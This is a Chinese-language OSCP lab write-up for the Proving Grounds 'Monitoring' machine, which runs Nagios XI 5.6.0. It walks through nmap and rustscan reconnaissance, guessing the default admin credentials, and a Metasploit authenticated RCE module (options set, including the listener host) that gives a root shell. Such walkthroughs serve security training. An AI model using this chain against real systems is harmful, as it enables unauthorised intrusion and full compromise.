【OSCP】- Monitoring 靶场学习(Proving Grounds Play)
目录
- 0. 靶场信息
- 1. 信息收集
- 2. 80端口
- 3. 提权
0. 靶场信息
Summary
In this lab, we exploit an authenticated remote code execution vulnerability in the Nagios XI monitoring software. The application is misconfigured to run with root privileges, allowing us to escalate immediately to root once the vulnerability is exploited.
Level: Easy
Community Rating: Intermediate
Number of Flags: 1
OS: Linux
Vector Type: Webapp
1. 信息收集
先快速扫描全端口:rustscan -a 192.168.184.136 -r 1-65535
再扫描开放的端口:nmap -p22,25,80,443,5667 -AO -sV -sT 192.168.184.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-02 18:16 CST
Nmap scan report for bogon (192.168.184.136)
Host is up (0.17s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
| 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after: 2030-09-06T18:28:08
|_http-title: Nagios XI
5667/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (98%), Linux 3.10 - 4.11 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.12 (93%), Linux 3.13 or 4.2 (93%), Linux 3.16 - 4.6 (93%), Linux 3.18 (93%), Linux 3.8 - 3.11 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 172.57 ms bogon (192.168.45.1)
2 172.55 ms bogon (192.168.45.254)
3 174.78 ms bogon (192.168.251.1)
4 172.72 ms bogon (192.168.184.136)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.70 seconds
2. 80端口
80端口获取到的相关信息:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
浏览器访问 80 端口:http://192.168.184.136/
扫描站点目录:dirsearch -u 192.168.184.136
没有什么可用的结果。
查看网站指纹:whatweb http://192.168.184.136/
CMS 是 Nagios XI 。
点击按钮 access nagios xi:
这里有个登录接口,尝试常规的弱口令以后没有什么结果,去搜索这个站点默认的登录用户名和密码,nagiosadmin,密码可能是 nagiosadmin,nagios,试了试都提示错误。再针对这个用户名尝试常见的密码,最后用 nagiosadmin/admin 登录进去了。
URL中发现是 /nagiosxi 开头的,所以重新扫描一下目录:dirsearch -u http://192.168.184.136/nagiosxi/
每个路径都看一下:
-
http://192.168.184.136/nagiosxi/backend/ :
再访问 http://192.168.184.136/nagiosxi/backend/?cmd=getProgramStatus :
依旧是没有什么很有用的信息。
在左下角发现了版本 Nagios XI 5.6.0。
3. 提权
直接在 MSF 中搜索:search nagios
综合版本信息,以及rank,尝试了几个,最后用用10比较好一点。
10的标题中也写了是 authenticated,认证后的,所以需要提供刚才登录的账号和密码。
使用模块:use 10
查看模块需要配置的参数:show options
可以看到几个必须的选项:
设置目标ip:set RHOSTS 192.168.229.136
设置密码:set PASSWORD admin
设置监听IP,也就是本机的IP:set LHOST 192.168.45.220
设置服务绑定的 IP,也就是本机的IP:set SRVHOST 192.168.45.220
执行:exploit
连接上了以后执行:shell
查看当前用户:id
直接是root用户了。
拿到了flag。